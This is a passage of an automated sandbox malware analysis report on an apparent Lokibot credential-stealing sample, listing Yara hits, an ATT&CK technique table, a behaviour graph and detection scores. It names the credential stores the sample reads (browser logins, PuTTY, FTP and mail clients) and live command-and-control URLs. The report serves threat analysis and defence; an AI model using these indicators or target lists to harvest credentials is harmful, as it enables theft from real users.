                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeQueries volume information: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzQ25HVUbf.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iWEWjTXiqXke.exe PID: 8176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iWEWjTXiqXke.exe PID: 616, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000009.00000002.2599826516.0000000001078000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzQ25HVUbf.exe PID: 8076, type: MEMORYSTR
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: PopPassword18_2_0040D069
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: SmtpPassword18_2_0040D069
                Source: Yara matchFile source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                11
                Process Injection
                1
                Masquerading
                2
                OS Credential Dumping
                111
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                Scheduled Task/Job
                11
                Disable or Modify Tools
                2
                Credentials in Registry
                1
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                31
                Virtualization/Sandbox Evasion
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares2
                Data from Local System
                2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture112
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Software Packing
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Timestomp
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1589028 Sample: kzQ25HVUbf.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 49 Suricata IDS alerts for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 11 other signatures 2->55 7 kzQ25HVUbf.exe 7 2->7         started        11 iWEWjTXiqXke.exe 5 2->11         started        process3 file4 39 C:\Users\user\AppData\...\iWEWjTXiqXke.exe, PE32 7->39 dropped 41 C:\Users\...\iWEWjTXiqXke.exe:Zone.Identifier, ASCII 7->41 dropped 43 C:\Users\user\AppData\Local\...\tmp53FD.tmp, XML 7->43 dropped 45 C:\Users\user\AppData\...\kzQ25HVUbf.exe.log, ASCII 7->45 dropped 57 Uses schtasks.exe or at.exe to add and modify task schedules 7->57 59 Adds a directory exclusion to Windows Defender 7->59 13 kzQ25HVUbf.exe 133 7->13         started        17 powershell.exe 23 7->17         started        19 powershell.exe 23 7->19         started        21 schtasks.exe 1 7->21         started        61 Antivirus detection for dropped file 11->61 63 Multi AV Scanner detection for dropped file 11->63 65 Tries to steal Mail credentials (via file registry) 11->65 67 Machine Learning detection for dropped file 11->67 23 schtasks.exe 11->23         started        25 iWEWjTXiqXke.exe 11->25         started        27 iWEWjTXiqXke.exe 11->27         started        signatures5 process6 dnsIp7 47 94.156.177.41, 49804, 49811, 49817 NET1-ASBG Bulgaria 13->47 69 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->69 71 Tries to steal Mail credentials (via file / registry access) 13->71 73 Tries to harvest and steal ftp login credentials 13->73 75 Tries to harvest and steal browser information (history, passwords, etc) 13->75 77 Loading BitLocker PowerShell Module 17->77 29 conhost.exe 17->29         started        31 WmiPrvSE.exe 17->31         started        33 conhost.exe 19->33         started        35 conhost.exe 21->35         started        37 conhost.exe 23->37         started        signatures8 process9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                kzQ25HVUbf.exe66%ReversingLabsByteCode-MSIL.Trojan.Remcos
                kzQ25HVUbf.exe73%VirustotalBrowse
                kzQ25HVUbf.exe100%AviraHEUR/AGEN.1309499
                kzQ25HVUbf.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe100%AviraHEUR/AGEN.1309499
                C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe66%ReversingLabsByteCode-MSIL.Trojan.Remcos
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://94.156.177.41/soja/five/fre.php100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://kbfvzoboss.bid/alien/fre.phpfalse
                    high
                    http://alphastand.win/alien/fre.phpfalse
                      high
                      http://alphastand.trade/alien/fre.phpfalse
                        high
                        http://alphastand.top/alien/fre.phpfalse
                          high
                          http://94.156.177.41/soja/five/fre.phptrue
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekzQ25HVUbf.exe, 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, iWEWjTXiqXke.exe, 0000000A.00000002.1573168768.0000000002BB3000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.ibsensoftware.com/iWEWjTXiqXke.exe, iWEWjTXiqXke.exe, 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              94.156.177.41
                              unknownBulgaria
                              43561NET1-ASBGtrue
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1589028
                              Start date and time:2025-01-11 08:36:13 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 59s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:22
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:kzQ25HVUbf.exe
                              renamed because original name is a hash value
                              Original Sample Name:8097164e911c48c3e99b7676138f793a19fee809d2931090ec7c0c2f65073889.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@21/17@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 36
                              • Number of non-executed functions: 9
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 184.28.90.27, 20.12.23.50
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              TimeTypeDescription
                              02:37:10API Interceptor124x Sleep call for process: kzQ25HVUbf.exe modified
                              02:37:15API Interceptor37x Sleep call for process: powershell.exe modified
                              02:37:23API Interceptor1x Sleep call for process: iWEWjTXiqXke.exe modified
                              07:37:16Task SchedulerRun new task: iWEWjTXiqXke path: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              94.156.177.41YvVDV4cbjy.exeGet hashmaliciousLokibotBrowse
                              • 94.156.177.41/simple/five/fre.php
                              EozUxz4ybi.exeGet hashmaliciousLokibotBrowse
                              • 94.156.177.41/simple/five/fre.php
                              oAUBqI6vQ7.exeGet hashmaliciousLokibotBrowse
                              • 94.156.177.41/simple/five/fre.php
                              Quotation2025-0107pdf.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                              • 94.156.177.41/mars/five/fre.php
                              ZsRFRjkt9q.exeGet hashmaliciousLokibotBrowse
                              • 94.156.177.41/alpha/five/fre.php
                              0yWVteGq5T.exeGet hashmaliciousLokibotBrowse
                              • 94.156.177.41/simple/five/fre.php
                              CLOSURE DATE FOR THE YEAR.exeGet hashmaliciousLokibotBrowse
                              • 94.156.177.41/kings/five/fre.php
                              Order84746.exeGet hashmaliciousLokibotBrowse
                              • 94.156.177.41/davinci/five/fre.php
                              FVR-N2411-07396.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                              • 94.156.177.41/soja/five/fre.php
                              Scan copy.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                              • 94.156.177.41/simple/five/fre.php
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
